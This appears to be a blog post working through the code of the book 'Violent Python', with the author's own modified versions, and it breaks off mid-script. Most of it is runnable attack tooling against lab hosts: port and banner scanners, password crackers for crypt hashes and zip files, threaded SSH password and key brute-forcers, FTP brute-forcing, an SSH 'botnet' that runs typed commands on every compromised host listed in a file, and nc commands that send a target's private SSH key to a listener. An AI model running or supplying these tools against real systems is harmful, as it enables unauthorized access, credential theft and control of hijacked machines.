This post works through the code in *Violent Python* (《Python绝技:运用Python成为顶级黑客》), typing in each example to study Python security programming techniques and ideas, then adapting the code where the situation calls for it.
Install the python-nmap package:
wget http://xael.org/norman/python/python-nmap/python-nmap-0.2.4.tar.gz -O nmap.tar.gz
tar -xzf nmap.tar.gz
cd python-nmap-0.2.4/
python setup.py install
Alternatively, easy_install offers a simpler route: easy_install python-nmap
Install the other dependencies: easy_install pyPdf python-nmap pygeoip mechanize BeautifulSoup4
A few Bluetooth-related libraries cannot be installed with easy_install: apt-get install python-bluez bluetooth python-obexftp
In short, script execution means passing a .py file to the Python interpreter, while interactive use means typing python at the command line and entering statements directly.
Python's core types: strings, integers, lists, booleans, and dictionaries.
Four string methods: upper() for uppercase output, lower() for lowercase output, replace() for substitution, find() for searching.
List methods: append() adds an element, index() returns an element's index, remove() deletes an element, sort() sorts the list, and len() returns the list's length.
Dictionary methods: keys() returns a list of all keys in the dictionary, items() returns a list of all key/value pairs.
With the socket module, the connect() method opens a network connection to the given IP and port, and recv(1024) reads the next 1024 bytes from the socket.
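A quick tour of the methods listed above (the banner string and port numbers are made up for illustration):

```python
# String methods
banner = 'vsFTPd 2.3.4'
print(banner.upper())                # VSFTPD 2.3.4
print(banner.lower())                # vsftpd 2.3.4
print(banner.replace('2.3.4', 'x'))  # vsFTPd x
print(banner.find('FTPd'))           # 2 -- index of the match, -1 if absent

# List methods
ports = [80, 21]
ports.append(443)                    # [80, 21, 443]
ports.sort()                         # [21, 80, 443]
print(ports.index(443))              # 2
ports.remove(80)                     # [21, 443]
print(len(ports))                    # 2

# Dictionary methods
services = {21: 'ftp', 22: 'ssh'}
print(list(services.keys()))         # [21, 22]
print(list(services.items()))        # [(21, 'ftp'), (22, 'ssh')]
```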
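As a minimal sketch of connect() and recv(), a throwaway local server lets both be exercised without a real target (the banner text here is invented; a real FTP service would send its own):

```python
import socket
import threading

# A one-shot server on an OS-assigned loopback port.
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(('127.0.0.1', 0))   # port 0: let the OS pick a free port
server.listen(1)
port = server.getsockname()[1]

def serve():
    conn, _ = server.accept()
    conn.send(b'220 fake FTP banner\r\n')
    conn.close()

t = threading.Thread(target=serve)
t.start()

s = socket.socket()              # defaults to AF_INET, SOCK_STREAM
s.connect(('127.0.0.1', port))   # open the connection
banner = s.recv(1024)            # read up to the next 1024 bytes
s.close()
t.join()
server.close()
print(banner)
```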
if condition_one:
    statement_one
elif condition_two:
    statement_two
else:
    statement_three
try/except statements handle exceptions; the exception can be bound to a variable e so it can be printed, calling str() to convert e into a string.
Functions are defined with the def keyword. The example defines a function that grabs FTP banner information:
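A tiny sketch of that pattern (shown with Python 3's `except ... as e` syntax; the book's Python 2 code writes `except Exception, e`):

```python
try:
    # The file name is deliberately bogus so the open() fails.
    banner = open('no_such_file_xyz.txt').read()
except Exception as e:            # bind the exception object to e
    msg = '[-] Error: ' + str(e)  # str() turns it into printable text
print(msg)
```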
#!/usr/bin/python
#coding=utf-8
import socket

def retBanner(ip, port):
    try:
        socket.setdefaulttimeout(2)
        s = socket.socket()
        s.connect((ip, port))
        banner = s.recv(1024)
        return banner
    except:
        return

def checkVulns(banner):
    if 'vsFTPd' in banner:
        print '[+] vsFTPd is vulnerable.'
    elif 'FreeFloat Ftp Server' in banner:
        print '[+] FreeFloat Ftp Server is vulnerable.'
    else:
        print '[-] FTP Server is not vulnerable.'
    return

def main():
    ips = ['10.10.10.128', '10.10.10.160']
    port = 21
    banner1 = retBanner(ips[0], port)
    if banner1:
        print '[+] ' + ips[0] + ": " + banner1.strip('\n')
        checkVulns(banner1)
    banner2 = retBanner(ips[1], port)
    if banner2:
        print '[+] ' + ips[1] + ": " + banner2.strip('\n')
        checkVulns(banner2)

if __name__ == '__main__':
    main()
The same scan rewritten with a for statement:
#!/usr/bin/python
#coding=utf-8
import socket

def retBanner(ip, port):
    try:
        socket.setdefaulttimeout(2)
        s = socket.socket()
        s.connect((ip, port))
        banner = s.recv(1024)
        return banner
    except:
        return

def checkVulns(banner):
    if 'vsFTPd' in banner:
        print '[+] vsFTPd is vulnerable.'
    elif 'FreeFloat Ftp Server' in banner:
        print '[+] FreeFloat Ftp Server is vulnerable.'
    else:
        print '[-] FTP Server is not vulnerable.'
    return

def main():
    portList = [21, 22, 25, 80, 110, 443]
    ip = '10.10.10.128'
    for port in portList:
        banner = retBanner(ip, port)
        if banner:
            print '[+] ' + ip + ':' + str(port) + '--' + banner
            if port == 21:
                checkVulns(banner)

if __name__ == '__main__':
    main()
open() opens a file: r read-only, r+ read/write, w create (truncating any existing file), a append, b binary.
In the same directory:
In a different directory:
A relative path searching downward from the current directory is prefixed with a dot; an absolute path needs no dot, since it does not start from the current directory.
The sys.argv list holds all command-line arguments: sys.argv[0] is the name of the Python script, and the rest are the arguments proper.
os.path.isfile() checks whether the file exists.
os.access() checks whether the current user has permission to read the file.
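The modes can be round-tripped through a temp directory (the file name is throwaway):

```python
import os
import tempfile

path = os.path.join(tempfile.mkdtemp(), 'notes.txt')
f = open(path, 'w')   # 'w' creates the file, truncating any existing one
f.write('line one\n')
f.close()
f = open(path, 'a')   # 'a' appends instead of overwriting
f.write('line two\n')
f.close()
f = open(path, 'r')   # 'r' is read-only
data = f.read()
f.close()
print(data)
```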
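These two checks can be tried in isolation before wiring them into a script (the path is a throwaway temp file):

```python
import os
import tempfile

target = os.path.join(tempfile.mkdtemp(), 'vuln_banners.txt')
exists_before = os.path.isfile(target)  # False: nothing there yet
open(target, 'w').close()
exists_after = os.path.isfile(target)   # True: the file now exists
readable = os.access(target, os.R_OK)   # True: we just created it
print(exists_before)
print(exists_after)
print(readable)
```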
#!/usr/bin/python
#coding=utf-8
import sys
import os

if len(sys.argv) == 2:
    filename = sys.argv[1]
    if not os.path.isfile(filename):
        print '[-] ' + filename + ' does not exist.'
        exit(0)
    if not os.access(filename, os.R_OK):
        print '[-] ' + filename + ' access denied.'
        exit(0)
    print '[+] Reading From: ' + filename
Combining the pieces above into a scanner that checks a target host's ports and their banner information:
#!/usr/bin/python
#coding=utf-8
import socket
import sys
import os

def retBanner(ip, port):
    try:
        socket.setdefaulttimeout(2)
        s = socket.socket()
        s.connect((ip, port))
        banner = s.recv(1024)
        return banner
    except:
        return

def checkVulns(banner, filename):
    f = open(filename, 'r')
    for line in f.readlines():
        if line.strip('\n') in banner:
            print '[+] Server is vulnerable: ' + banner.strip('\n')

def main():
    if len(sys.argv) == 2:
        filename = sys.argv[1]
        if not os.path.isfile(filename):
            print '[-] ' + filename + ' does not exist.'
            exit(0)
        if not os.access(filename, os.R_OK):
            print '[-] ' + filename + ' access denied.'
            exit(0)
        print '[+] Reading From: ' + filename
    else:
        print '[-] Usage: ' + str(sys.argv[0]) + ' <filename>'
        exit(0)
    portList = [21, 22, 25, 80, 110, 443]
    ip = '10.10.10.128'
    for port in portList:
        banner = retBanner(ip, port)
        if banner:
            print '[+] ' + ip + ':' + str(port) + '--' + banner
            if port == 21:
                checkVulns(banner, filename)

if __name__ == '__main__':
    main()
Output:
This script reads two files: one containing encrypted passwords and one a dictionary of guesses. testPass() reads the dictionary file and encrypts each word with crypt.crypt(), which takes a plaintext password and a two-character salt; the result is then compared with the encrypted password to check for a match.
First, a quick look at crypt:
The salt is stored as the first two characters of the ciphertext, so extracting the first two characters of the encrypted password gives the salt.
#!/usr/bin/python
#coding=utf-8
import crypt

def testPass(cryptPass):
    salt = cryptPass[0:2]
    dictFile = open('dictionary.txt', 'r')
    for word in dictFile.readlines():
        word = word.strip('\n')
        cryptWord = crypt.crypt(word, salt)
        if cryptWord == cryptPass:
            print '[+] Found Password: ' + word + "\n"
            return
    print '[-] Password not Found.\n'
    return

def main():
    passFile = open('passwords.txt')
    for line in passFile.readlines():
        if ":" in line:
            user = line.split(':')[0]
            cryptPass = line.split(':')[1].strip(' ')
            print '[*] Cracking Password For: ' + user
            testPass(cryptPass)

if __name__ == '__main__':
    main()
Output:
Modern Unix-like systems store password hashes in the /etc/shadow file, mostly using stronger hash algorithms such as SHA-512, e.g.:
Python's hashlib library provides SHA-512, so the script can be upgraded accordingly for password cracking.
The next script relies on the zipfile library's extractall() method, whose pwd parameter supplies the password.
#!/usr/bin/python
#coding=utf-8
import zipfile
import optparse
from threading import Thread

def extractFile(zFile, password):
    try:
        zFile.extractall(pwd=password)
        print '[+] Found Password: ' + password + '\n'
    except:
        pass

def main():
    parser = optparse.OptionParser("[*] Usage: ./unzip.py -f <zipfile> -d <dictionary>")
    parser.add_option('-f', dest='zname', type='string', help='specify zip file')
    parser.add_option('-d', dest='dname', type='string', help='specify dictionary file')
    (options, args) = parser.parse_args()
    if (options.zname == None) | (options.dname == None):
        print parser.usage
        exit(0)
    zFile = zipfile.ZipFile(options.zname)
    passFile = open(options.dname)
    for line in passFile.readlines():
        line = line.strip('\n')
        t = Thread(target=extractFile, args=(zFile, line))
        t.start()

if __name__ == '__main__':
    main()
The code imports the optparse library to parse command-line arguments: OptionParser() creates a parser instance, parser.add_option() declares which options to parse, and usage holds the help text printed for the arguments. Threads are also used to speed up the cracking.
Output:
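optparse can be exercised in isolation by handing parse_args() an explicit argv list instead of the real sys.argv (the file names here are made up):

```python
import optparse

parser = optparse.OptionParser('[*] Usage: ./unzip.py -f <zipfile> -d <dictionary>')
parser.add_option('-f', dest='zname', type='string', help='specify zip file')
parser.add_option('-d', dest='dname', type='string', help='specify dictionary file')

# Simulate: ./unzip.py -f secret.zip -d dictionary.txt
options, args = parser.parse_args(['-f', 'secret.zip', '-d', 'dictionary.txt'])
print(options.zname)   # secret.zip
print(options.dname)   # dictionary.txt
print(parser.usage)    # the string passed to OptionParser()
```

optparse also auto-generates -h/--help from these declarations, which is why the option strings themselves must avoid -h.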
#!/usr/bin/python
#coding=utf-8
import optparse
import socket
from socket import *

def connScan(tgtHost, tgtPort):
    try:
        connSkt = socket(AF_INET, SOCK_STREAM)
        connSkt.connect((tgtHost, tgtPort))
        connSkt.send('ViolentPython\r\n')
        result = connSkt.recv(100)
        print '[+] %d/tcp open' % tgtPort
        print '[+] ' + str(result)
        connSkt.close()
    except:
        print '[-] %d/tcp closed' % tgtPort

def portScan(tgtHost, tgtPorts):
    try:
        tgtIP = gethostbyname(tgtHost)
    except:
        print "[-] Cannot resolve '%s': Unknown host" % tgtHost
        return
    try:
        tgtName = gethostbyaddr(tgtIP)
        print '\n[+] Scan Results for: ' + tgtName[0]
    except:
        print '\n[+] Scan Results for: ' + tgtIP
    setdefaulttimeout(1)
    for tgtPort in tgtPorts:
        print 'Scanning port ' + tgtPort
        connScan(tgtHost, int(tgtPort))

def main():
    parser = optparse.OptionParser("[*] Usage: ./portscanner.py -H <target host> -p <target port[s]>")
    parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
    parser.add_option('-p', dest='tgtPort', type='string', help='specify target port[s]')
    (options, args) = parser.parse_args()
    tgtHost = options.tgtHost
    tgtPorts = str(options.tgtPort).split(',')
    if (tgtHost == None) | (tgtPorts[0] == None):
        print parser.usage
        exit(0)
    portScan(tgtHost, tgtPorts)

if __name__ == '__main__':
    main()
This script takes command-line input: the user supplies a host IP and the port numbers to scan, with multiple ports separated by commas. If the arguments are present (it suffices to check that the first entry of the port list is non-empty), the scanning function is called. portScan() first tries gethostbyname() to resolve the hostname to an IP; on failure the program reports the host as unresolvable and returns. It then tries gethostbyaddr() to obtain hostname information for that IP, printing the first element of the result on success or the raw IP otherwise, and finally loops over the ports calling connScan(). In connScan(), socket() takes two parameters, AF_INET and SOCK_STREAM, which select an IPv4 address and a TCP stream respectively; these are the defaults, which is why the previous chapter's code omitted them. The rest mirrors the earlier code.
One small caveat: optparse automatically adds the -h and --help options to print the argument help, so using -h for the host option raises an error; use uppercase H, i.e. the book's "-H", instead.
Output:
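That default can be checked directly, a small sketch confirming that a bare socket() equals socket(AF_INET, SOCK_STREAM):

```python
from socket import socket, AF_INET, SOCK_STREAM

s = socket()   # no arguments: same as socket(AF_INET, SOCK_STREAM)
print(s.family == AF_INET)    # True: IPv4
print(s.type == SOCK_STREAM)  # True: TCP stream
s.close()
```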
The previous section's code, modified to use threads. To give one function full control of the screen, a semaphore is used: it stops the other threads from running, avoiding the garbled and out-of-order output that concurrent printing would cause. Before printing, a thread calls screenLock.acquire() to take the lock; if the semaphore is unlocked the thread may proceed and print to the screen, otherwise it must wait until the semaphore is released.
#!/usr/bin/python
#coding=utf-8
import optparse
import socket
from socket import *
from threading import *

# define a semaphore
screenLock = Semaphore(value=1)

def connScan(tgtHost, tgtPort):
    try:
        connSkt = socket(AF_INET, SOCK_STREAM)
        connSkt.connect((tgtHost, tgtPort))
        connSkt.send('ViolentPython\r\n')
        result = connSkt.recv(100)
        # take the lock before printing
        screenLock.acquire()
        print '[+] %d/tcp open' % tgtPort
        print '[+] ' + str(result)
    except:
        # take the lock before printing
        screenLock.acquire()
        print '[-] %d/tcp closed' % tgtPort
    finally:
        # release the lock, then close the socket
        screenLock.release()
        connSkt.close()

def portScan(tgtHost, tgtPorts):
    try:
        tgtIP = gethostbyname(tgtHost)
    except:
        print "[-] Cannot resolve '%s': Unknown host" % tgtHost
        return
    try:
        tgtName = gethostbyaddr(tgtIP)
        print '\n[+] Scan Results for: ' + tgtName[0]
    except:
        print '\n[+] Scan Results for: ' + tgtIP
    setdefaulttimeout(1)
    for tgtPort in tgtPorts:
        t = Thread(target=connScan, args=(tgtHost, int(tgtPort)))
        t.start()

def main():
    parser = optparse.OptionParser("[*] Usage: ./portscanner.py -H <target host> -p <target port[s]>")
    parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
    parser.add_option('-p', dest='tgtPort', type='string', help='specify target port[s]')
    (options, args) = parser.parse_args()
    tgtHost = options.tgtHost
    tgtPorts = str(options.tgtPort).split(',')
    if (tgtHost == None) | (tgtPorts[0] == None):
        print parser.usage
        exit(0)
    portScan(tgtHost, tgtPorts)

if __name__ == '__main__':
    main()
Output:
As the results show, with threads the ports are no longer scanned in input order but concurrently; thanks to the semaphore locking, the output still comes out clean and unscrambled.
If you did not install it earlier, first download python-nmap from http://xael.org/pages/python-nmap-en.html
#!/usr/bin/python
#coding=utf-8
import nmap
import optparse

def nmapScan(tgtHost, tgtPort):
    # create a PortScanner() object
    nmScan = nmap.PortScanner()
    # call the PortScanner class's scan() with the target and port to run an nmap scan
    nmScan.scan(tgtHost, tgtPort)
    # print the state reported in the scan results
    state = nmScan[tgtHost]['tcp'][int(tgtPort)]['state']
    print '[*] ' + tgtHost + " tcp/" + tgtPort + " " + state

def main():
    parser = optparse.OptionParser("[*] Usage: ./nmapScan.py -H <target host> -p <target port[s]>")
    parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
    parser.add_option('-p', dest='tgtPorts', type='string', help='specify target port[s]')
    (options, args) = parser.parse_args()
    tgtHost = options.tgtHost
    tgtPorts = str(options.tgtPorts).split(',')
    if (tgtHost == None) | (tgtPorts[0] == None):
        print parser.usage
        exit(0)
    for tgtPort in tgtPorts:
        nmapScan(tgtHost, tgtPort)

if __name__ == '__main__':
    main()
Output:
If you did not install it back in Chapter 1, first download Pexpect: https://pypi.python.org/pypi/pexpect/
The Pexpect module can interact with programs, wait for expected screen output, and respond differently based on what it sees.
First, a normal SSH connection test:
Mimicking that flow, the code is:
#!/usr/bin/python
#coding=utf-8
import pexpect

# prompt strings shown in the terminal once an SSH session is established
PROMPT = ['# ', '>>> ', '> ', '\$ ']

def send_command(child, cmd):
    # send a command
    child.sendline(cmd)
    # expect one of the shell prompts to appear
    child.expect(PROMPT)
    # print everything before the prompt
    print child.before

def connect(user, host, password):
    # the message shown when the host presents a new public key
    ssh_newkey = 'Are you sure you want to continue connecting'
    connStr = 'ssh ' + user + '@' + host
    # spawn a child process for the ssh command
    child = pexpect.spawn(connStr)
    # expect the new-key message or the password prompt, or time out
    ret = child.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword: '])
    # matched TIMEOUT
    if ret == 0:
        print '[-] Error Connecting'
        return
    # matched ssh_newkey
    if ret == 1:
        # answer yes, then expect the password prompt
        child.sendline('yes')
        ret = child.expect([pexpect.TIMEOUT, '[P|p]assword: '])
        # matched TIMEOUT
        if ret == 0:
            print '[-] Error Connecting'
            return
    # send the password
    child.sendline(password)
    child.expect(PROMPT)
    return child

def main():
    host = '10.10.10.128'
    user = 'msfadmin'
    password = 'msfadmin'
    child = connect(user, host, password)
    send_command(child, 'uname -a')

if __name__ == '__main__':
    main()
This version takes no command-line arguments and offers no interactive shell.
Output:
The book mentions running this against BackTrack, so let's test that too:
Generate an ssh key in BT5 and start the SSH service:
sshd-generate
service ssh start
./sshScan.py
[My modified code]
The script can be improved further; the version below adds parameterized input and an interactive command-line shell:
#!/usr/bin/python
#coding=utf-8
import pexpect
from optparse import OptionParser

# prompt strings shown in the terminal once an SSH session is established
PROMPT = ['# ', '>>> ', '> ', '\$ ']

def send_command(child, cmd):
    # send a command
    child.sendline(cmd)
    # expect one of the shell prompts to appear
    child.expect(PROMPT)
    # print everything before the prompt
    print child.before.split('\n')[1]

def connect(user, host, password):
    # the message shown when the host presents a new public key
    ssh_newkey = 'Are you sure you want to continue connecting'
    connStr = 'ssh ' + user + '@' + host
    # spawn a child process for the ssh command
    child = pexpect.spawn(connStr)
    # expect the new-key message or the password prompt, or time out
    ret = child.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword: '])
    # matched TIMEOUT
    if ret == 0:
        print '[-] Error Connecting'
        return
    # matched ssh_newkey
    if ret == 1:
        # answer yes, then expect the password prompt
        child.sendline('yes')
        ret = child.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword: '])
        # matched TIMEOUT
        if ret == 0:
            print '[-] Error Connecting'
            return
    # send the password
    child.sendline(password)
    child.expect(PROMPT)
    return child

def main():
    parser = OptionParser("[*] Usage: ./sshCommand2.py -H <host> -u <user> -p <password>")
    parser.add_option('-H', dest='host', type='string', help='specify target host')
    parser.add_option('-u', dest='username', type='string', help='target username')
    parser.add_option('-p', dest='password', type='string', help='target password')
    (options, args) = parser.parse_args()
    if (options.host == None) | (options.username == None) | (options.password == None):
        print parser.usage
        exit(0)
    child = connect(options.username, options.host, options.password)
    while True:
        command = raw_input(' ')
        send_command(child, command)

if __name__ == '__main__':
    main()
Now you can point it at a target host, connect over SSH, and get an SSH-like interactive command-line experience:
pxssh is a subclass of pexpect's spawn class that adds the login(), logout(), and prompt() methods, making SSH connections easy without hand-rolling the relatively complex pexpect calls yourself.
The prompt(self, timeout=20) method matches a fresh prompt.
Replacing the previous section's script with pxssh:
#!/usr/bin/python
#coding=utf-8
from pexpect import pxssh

def send_command(s, cmd):
    s.sendline(cmd)
    # match the prompt
    s.prompt()
    # print everything before the prompt
    print s.before

def connect(host, user, password):
    try:
        s = pxssh.pxssh()
        # log in over ssh with the pxssh class's login() method
        s.login(host, user, password)
        return s
    except:
        print '[-] Error Connecting'
        exit(0)

s = connect('10.10.10.128', 'msfadmin', 'msfadmin')
send_command(s, 'uname -a')
One initial problem: typing import pxssh as the book shows raises an error even though the package is clearly installed. Some digging revealed that pxssh lives inside the pexpect package, so changing the line to from pexpect import pxssh fixes it.
Output:
Continuing to modify the code:
#!/usr/bin/python
#coding=utf-8
from pexpect import pxssh
import optparse
import time
from threading import *

maxConnections = 5
# a BoundedSemaphore: release() checks that the count never exceeds its initial value
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0

def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        # log in over ssh with the pxssh class's login() method
        s.login(host, user, password)
        print '[+] Password Found: ' + password
        Found = True
    except Exception, e:
        # the SSH server may be flooded with connections; wait a while before retrying
        if 'read_nonblocking' in str(e):
            Fails += 1
            time.sleep(5)
            # recursive call to connect(): must not release the lock
            connect(host, user, password, False)
        # pxssh had trouble extracting the command prompt; wait a moment before retrying
        elif 'synchronize with original prompt' in str(e):
            time.sleep(1)
            # recursive call to connect(): must not release the lock
            connect(host, user, password, False)
    finally:
        if release:
            # release the lock
            connection_lock.release()

def main():
    parser = optparse.OptionParser('[*] Usage: ./sshBrute.py -H <host> -u <user> -f <password file>')
    parser.add_option('-H', dest='host', type='string', help='specify target host')
    parser.add_option('-u', dest='username', type='string', help='target username')
    parser.add_option('-f', dest='file', type='string', help='specify password file')
    (options, args) = parser.parse_args()
    if (options.host == None) | (options.username == None) | (options.file == None):
        print parser.usage
        exit(0)
    host = options.host
    username = options.username
    file = options.file
    fn = open(file, 'r')
    for line in fn.readlines():
        if Found:
            print '[*] Exiting: Password Found'
            exit(0)
        if Fails > 5:
            print '[!] Exiting: Too Many Socket Timeouts'
            exit(0)
        # take the lock
        connection_lock.acquire()
        # strip the newline: '\r\n' on Windows, '\n' on Linux
        password = line.strip('\r').strip('\n')
        print '[-] Testing: ' + str(password)
        # this is not a recursive call to connect(), so the lock may be released
        t = Thread(target=connect, args=(host, username, password, True))
        t.start()

if __name__ == '__main__':
    main()
A semaphore is a counted thread-synchronization mechanism: release() increments the count, acquire() decrements it, and when the count reaches 0 acquire() blocks until release() is called. The threading library provides two kinds, Semaphore and BoundedSemaphore.
Semaphore: release() does not check whether the count exceeds its initial value (there is no upper bound; it can grow indefinitely).
BoundedSemaphore: release() checks that the count does not exceed its initial value, keeping the count honest.
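The difference can be shown in a few lines: a plain Semaphore silently accepts an extra release(), while a BoundedSemaphore raises ValueError:

```python
from threading import Semaphore, BoundedSemaphore

plain = Semaphore(value=1)
plain.release()            # fine: the count simply climbs to 2

bounded = BoundedSemaphore(value=1)
try:
    bounded.release()      # one release too many
    overflowed = False
except ValueError:
    overflowed = True      # BoundedSemaphore refuses to exceed its limit
print(overflowed)          # True
```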
Output:
To log in over SSH with a key, the format is: ssh user@host -i keyfile -o PasswordAuthentication=no
Originally the SSH private-key archive was to be downloaded from this site: http://digitaloffense.net/tools/debianopenssl/
but after all this time the site is no longer available.
For testing, the SSH RSA key file is instead transferred over from the target VM via nc:
Kali first starts an nc listener: nc -lp 4444 > id_rsa
Then on the Metasploitable target, enter the .ssh directory and send the id_rsa file (the private key, not the public one):
cd .ssh
nc -nv 10.10.10.160 4444 -q 1 < id_rsa
The script below tries each key found in the specified directory in turn to attempt a connection.
#!/usr/bin/python
#coding=utf-8
import pexpect
import optparse
import os
from threading import *

maxConnections = 5
# a BoundedSemaphore: release() checks that the count never exceeds its initial value
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0

def connect(user, host, keyfile, release):
    global Stop
    global Fails
    try:
        perm_denied = 'Permission denied'
        ssh_newkey = 'Are you sure you want to continue'
        conn_closed = 'Connection closed by remote host'
        opt = ' -o PasswordAuthentication=no'
        connStr = 'ssh ' + user + '@' + host + ' -i ' + keyfile + opt
        child = pexpect.spawn(connStr)
        ret = child.expect([pexpect.TIMEOUT, perm_denied, ssh_newkey, conn_closed, '$', '#', ])
        # matched ssh_newkey
        if ret == 2:
            print '[-] Adding Host to ~/.ssh/known_hosts'
            child.sendline('yes')
            connect(user, host, keyfile, False)
        # matched conn_closed
        elif ret == 3:
            print '[-] Connection Closed By Remote Host'
            Fails += 1
        # matched a shell prompt, '$' or '#'
        elif ret > 3:
            print '[+] Success. ' + str(keyfile)
            Stop = True
    finally:
        if release:
            # release the lock
            connection_lock.release()

def main():
    parser = optparse.OptionParser('[*] Usage: ./sshBrute.py -H <host> -u <user> -d <key directory>')
    parser.add_option('-H', dest='host', type='string', help='specify target host')
    parser.add_option('-u', dest='username', type='string', help='target username')
    parser.add_option('-d', dest='passDir', type='string', help='specify directory with keys')
    (options, args) = parser.parse_args()
    if (options.host == None) | (options.username == None) | (options.passDir == None):
        print parser.usage
        exit(0)
    host = options.host
    username = options.username
    passDir = options.passDir
    # os.listdir() returns every file and directory name under the given directory
    for filename in os.listdir(passDir):
        if Stop:
            print '[*] Exiting: Key Found.'
            exit(0)
        if Fails > 5:
            print '[!] Exiting: Too Many Connections Closed By Remote Host.'
            print '[!] Adjust number of simultaneous threads.'
            exit(0)
        # take the lock
        connection_lock.acquire()
        # join the directory path with the file or directory name
        fullpath = os.path.join(passDir, filename)
        print '[-] Testing keyfile ' + str(fullpath)
        t = Thread(target=connect, args=(username, host, fullpath, True))
        t.start()

if __name__ == '__main__':
    main()
Output:
#!/usr/bin/python
#coding=utf-8
import optparse
from pexpect import pxssh

# define a client class wrapping one SSH session
class Client(object):
    """docstring for Client"""
    def __init__(self, host, user, password):
        self.host = host
        self.user = user
        self.password = password
        self.session = self.connect()

    def connect(self):
        try:
            s = pxssh.pxssh()
            s.login(self.host, self.user, self.password)
            return s
        except Exception, e:
            print e
            print '[-] Error Connecting'

    def send_command(self, cmd):
        self.session.sendline(cmd)
        self.session.prompt()
        return self.session.before

def botnetCommand(command):
    for client in botNet:
        output = client.send_command(command)
        print '[*] Output from ' + client.host
        print '[+] ' + output + '\n'

def addClient(host, user, password):
    client = Client(host, user, password)
    botNet.append(client)

botNet = []
addClient('10.10.10.128', 'msfadmin', 'msfadmin')
addClient('10.10.10.153', 'root', 'toor')
botnetCommand('uname -a')
botnetCommand('whoami')
This code defines a client class that handles the SSH connection and command sending, then defines a botNet list to hold every host in the botnet, plus two functions: addClient() to add a zombie host, and botnetCommand() to iterate over the zombie hosts executing a command.
Output:
[My modified code]
Next is my modified version. The zombie-host information is stored in a file, with the three fields separated by colons, so the script can conveniently read the hosts in. The script also implements a batch interactive shell, much like the earlier SSH shell modification, except that each command entered is executed by every zombie host, which then returns its result:
The botnet.txt file:
botNet2.py:
#!/usr/bin/python
#coding=utf-8
from pexpect import pxssh
import optparse

botNet = []
# a list of hosts already added, so duplicates can be detected and skipped
hosts = []

# define a client class wrapping one SSH session
class Client(object):
    """docstring for Client"""
    def __init__(self, host, user, password):
        self.host = host
        self.user = user
        self.password = password
        self.session = self.connect()

    def connect(self):
        try:
            s = pxssh.pxssh()
            s.login(self.host, self.user, self.password)
            return s
        except Exception, e:
            print e
            print '[-] Error Connecting'

    def send_command(self, cmd):
        self.session.sendline(cmd)
        self.session.prompt()
        return self.session.before

def botnetCommand(cmd, k):
    for client in botNet:
        output = client.send_command(cmd)
        # only print once the last host has issued the request,
        # otherwise the output would repeat earlier results
        if k:
            print '[*] Output from ' + client.host
            print '[+] ' + output + '\n'

def addClient(host, user, password):
    if len(hosts) == 0:
        hosts.append(host)
        client = Client(host, user, password)
        botNet.append(client)
    else:
        t = True
        # add the host only if it is not already in the hosts list
        for h in hosts:
            if h == host:
                t = False
        if t:
            hosts.append(host)
            client = Client(host, user, password)
            botNet.append(client)

def main():
    parser = optparse.OptionParser('Usage: ./botNet.py -f <botnet file>')
    parser.add_option('-f', dest='file', type='string', help='specify botNet file')
    (options, args) = parser.parse_args()
    file = options.file
    if file == None:
        print parser.usage
        exit(0)
    # count the lines; this must not share the same open() as f below or it breaks
    count = len(open(file, 'r').readlines())
    while True:
        cmd = raw_input(' ')
        k = 0
        f = open(file, 'r')
        for line in f.readlines():
            line = line.strip('\n')
            host = line.split(':')[0]
            user = line.split(':')[1]
            password = line.split(':')[2]
            k += 1
            # only the call for the last host should print, because each
            # command's output accumulates everything printed before it
            if k < count:
                addClient(host, user, password)
                # not the last host's request: suppress the output for now
                botnetCommand(cmd, False)
            else:
                addClient(host, user, password)
                # the last host's request: now print the command output
                botnetCommand(cmd, True)

if __name__ == '__main__':
    main()
The main issue this modified version handles is duplicated output, as explained in the code comments.
Output:
Collected SSH zombie hosts can all be stored in the botnet.txt file, making the script very convenient to run for batch operations.
Some FTP servers allow anonymous login, since it helps with website access and software updates; the user simply enters the username "anonymous" and supplies an e-mail address in place of a password.
The code below uses the ftplib module's FTP(), login(), and quit() methods:
#!/usr/bin/python
#coding=utf-8
import ftplib

def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous', '[email protected]')
        print '\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.'
        ftp.quit()
        return True
    except Exception, e:
        print '\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed.'
        return False

hostname = '10.10.10.128'
anonLogin(hostname)
Output:
[My modified code]
Slightly modified to take the hostname interactively:
#!/usr/bin/python
#coding=utf-8
import ftplib

def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous', 'what')
        print '\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.'
        ftp.quit()
        return True
    except Exception, e:
        print '\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed.'

def main():
    while True:
        hostname = raw_input("Please enter the hostname: ")
        anonLogin(hostname)
        print

if __name__ == '__main__':
    main()
Output:
Again using the ftplib module, this time combined with a password file, to brute-force FTP credentials:
#!/usr/bin/python
#coding=utf-8
import ftplib

def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    for line in pF.readlines():
        username = line.split(':')[0]
        password = line.split(':')[1].strip('\r').strip('\n')
        print '[+] Trying: ' + username + '/' + password
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(username, password)
            print '\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + password
            ftp.quit()
            return (username, password)
        except Exception, e:
            pass
    print '\n[-] Could not brute force FTP credentials.'
    return (None, None)

host = '10.10.10.128'
passwdFile = 'ftpBL.txt'
bruteLogin(host, passwdFile)
Output:
The ftpBL.txt file:
[My modified code]
A small tweak:
#!/usr/bin/python
import ftplib

def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    for line in pF.readlines():
        username = line.split(':')[0]
        password = line.split(':')[1].strip('\r').strip('\n')
        print '[+] Trying: ' + username + "/" + password
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(username, password)
